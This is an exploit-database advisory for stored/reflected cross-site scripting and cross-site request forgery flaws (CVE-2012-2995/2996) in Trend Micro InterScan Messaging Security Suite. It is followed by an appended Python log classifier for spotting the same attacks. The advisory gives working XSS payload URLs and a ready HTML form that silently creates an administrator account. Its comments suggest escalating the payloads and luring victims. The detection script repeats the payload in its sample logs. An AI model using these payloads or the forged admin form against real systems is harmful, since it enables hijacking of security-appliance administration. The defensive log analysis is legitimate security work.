
Trend Micro Interscan Messaging Security Suite - Persistent Cross-Site Scripting / Cross-Site Request Forgery

14 Sep 2012 00:00:00 | Reported by modpr0be | Type: exploitdb | Source: www.exploit-db.com

Trend Micro Interscan Messaging Security Suite Stored XSS and CSRF vulnerabilities, affecting version 7.1-Build_Win32_139

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| 0day.today | Trend Micro InterScan Messaging Security Suite XSS / CSRF Vulnerabilities | 15 Sep 2012 00:00 | zdt |
| Check Point Advisories | Trend Micro InterScan Messaging Security Suite Cross-site Scripting (CVE-2012-2995) | 16 Dec 2012 00:00 | checkpoint_advisories |
| CVE | CVE-2012-2995 | 17 Sep 2012 14:00 | cve |
| CVE | CVE-2012-2996 | 17 Sep 2012 14:00 | cve |
| Cvelist | CVE-2012-2995 | 17 Sep 2012 14:00 | cvelist |
| Cvelist | CVE-2012-2996 | 17 Sep 2012 14:00 | cvelist |
| EUVD | EUVD-2012-2974 | 7 Oct 2025 00:30 | euvd |
| exploitpack | Trend Micro Interscan Messaging Security Suite - Persistent Cross-Site Scripting Cross-Site Request Forgery | 14 Sep 2012 00:00 | exploitpack |
| NVD | CVE-2012-2995 | 17 Sep 2012 14:55 | nvd |
| NVD | CVE-2012-2996 | 17 Sep 2012 14:55 | nvd |

# Exploit Title: Trend Micro InterScan Messaging Security Suite Stored XSS and CSRF
# Date: 13/09/2012
# Exploit Author: modpr0be (modpr0be[at]spentera.com)
# Vendor Homepage: http://www.trendmicro.com
# Software Link: http://www.trendmicro.com/ftp/products/interscan/IMSS_v7.1_Win_1394.zip
# Version: 7.1-Build_Win32_1394
# Tested on: Windows 2003 Standard Edition, XAMPP 1.7.4 (Default Config)
# CVE : CVE-2012-2995, CVE-2012-2996

# Software Description
# TrendMicro Interscan Messaging Security is the industry’s most comprehensive 
# mail gateway security. Choose state-of-the-art software or a hybrid solution 
# with on-premise virtual appliance and optional cloud pre-filter that blocks 
# the vast majority of spam and malware outside your network. Plus our Data 
# Privacy and Encryption Module secure outbound data to ensure privacy and 
# regulatory compliance.

# Vulnerability Overview
# Trend Micro InterScan Messaging Security Suite is susceptible to cross-site scripting (CWE-79) 
# and cross-site request forgery (CWE-352) vulnerabilities.

# Proof of Concept
# Persistent/Stored XSS
# This PoC stores the defined URL in the white list URL page. Each time a user accesses this page,
# the XSS alert will pop up. You can change the alert message box to something nasty (e.g. redirect to beef??)
hxxps://127.0.0.1:8445/addRuleAttrWrsApproveUrl.imss?wrsApprovedURL=xssxss"><script>alert('XSS')</script>

# Non-persistent/Reflected XSS
# This is non-persistent XSS; you might lure a target user into clicking this link :)
hxxps://127.0.0.1/initUpdSchPage.imss?src="><script>alert('XSS')</script>

# Cross-Site Request Forgery
# This PoC should be targeted at a user with admin privileges.
# It will add an admin user with username quorra and password quorra.123.
# The target victim must be authenticated when this PoC is performed.
<html>
<body>
<form action="hxxps://127.0.0.1:8445/saveAccountSubTab.imss" method="POST">
<input type="hidden" name="enabled" value="on" />
<input type="hidden" name="authMethod" value="1" />
<input type="hidden" name="name" value="quorra" />
<input type="hidden" name="password" value="quorra.123" />
<input type="hidden" name="confirmPwd" value="quorra.123" />
<input type="hidden" name="tabAction" value="saveAuth" />
<input type="hidden" name="gotoTab" value="saveAll" />
<input type="submit" value="CSRF" />
</form>
</body>
</html>

# References
# http://www.spentera.com/advisories/2012/SPN-05-2012.html
# http://www.kb.cert.org/vuls/id/471364
# http://www.trendmicro.com/us/enterprise/network-security/interscan-message-security/index.html
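
For defenders reviewing console traffic, the following added example (not part of the original advisory or of any Trend Micro code) flags requests that match the three proof-of-concept patterns above. The combined log format, the console hostname `imss.example.internal` and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Endpoints and parameters taken from the advisory's proof of concept.
XSS_PARAMS = {
    "/addRuleAttrWrsApproveUrl.imss": "wrsApprovedURL",  # stored XSS
    "/initUpdSchPage.imss": "src",                       # reflected XSS
}
CSRF_PATH = "/saveAccountSubTab.imss"                    # account creation
MARKUP = re.compile(r'[<>"]')  # characters that break out of an HTML attribute

# Assumption: Apache-style combined log format; adjust for the real log layout.
LINE = re.compile(
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" \d{3} \S+ "(?P<referer>[^"]*)"'
)

def classify(line, console_host):
    """Return 'xss-probe', 'csrf-suspect' or None for one access-log line."""
    m = LINE.search(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    param = XSS_PARAMS.get(url.path)
    if param:
        # parse_qs percent-decodes, so %22%3E is seen as "> here.
        values = parse_qs(url.query, keep_blank_values=True).get(param, [])
        if any(MARKUP.search(v) for v in values):
            return "xss-probe"
    if url.path == CSRF_PATH and m["method"] == "POST":
        # A forged form post arrives with a foreign (or missing) Referer.
        if urlsplit(m["referer"]).hostname != console_host:
            return "csrf-suspect"
    return None

HOST = "imss.example.internal"  # constructed console hostname
PFX = '10.0.0.5 - - [13/Sep/2012:10:00:00 +0000] '
ENC = "%22%3E%3Cscript%3Ealert(%27XSS%27)%3C/script%3E"  # the PoC payload, URL-encoded
SAMPLE = [  # constructed log lines
    PFX + f'"GET /addRuleAttrWrsApproveUrl.imss?wrsApprovedURL=xssxss{ENC} HTTP/1.1" 200 512 "-" "UA"',
    PFX + f'"GET /initUpdSchPage.imss?src={ENC} HTTP/1.1" 200 512 "-" "UA"',
    PFX + '"POST /saveAccountSubTab.imss HTTP/1.1" 200 90 "http://other.example/p.html" "UA"',
    PFX + f'"POST /saveAccountSubTab.imss HTTP/1.1" 200 90 "https://{HOST}:8445/" "UA"',
    PFX + '"GET /addRuleAttrWrsApproveUrl.imss?wrsApprovedURL=http%3A%2F%2Fexample.com HTTP/1.1" 200 512 "-" "UA"',
]

if __name__ == "__main__":
    for entry in SAMPLE:
        print(classify(entry, HOST), "<-", entry.split('"')[1])
```

A Referer check only surfaces suspect account-creation posts for review; it does not replace per-request anti-CSRF tokens and output encoding in the application itself.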
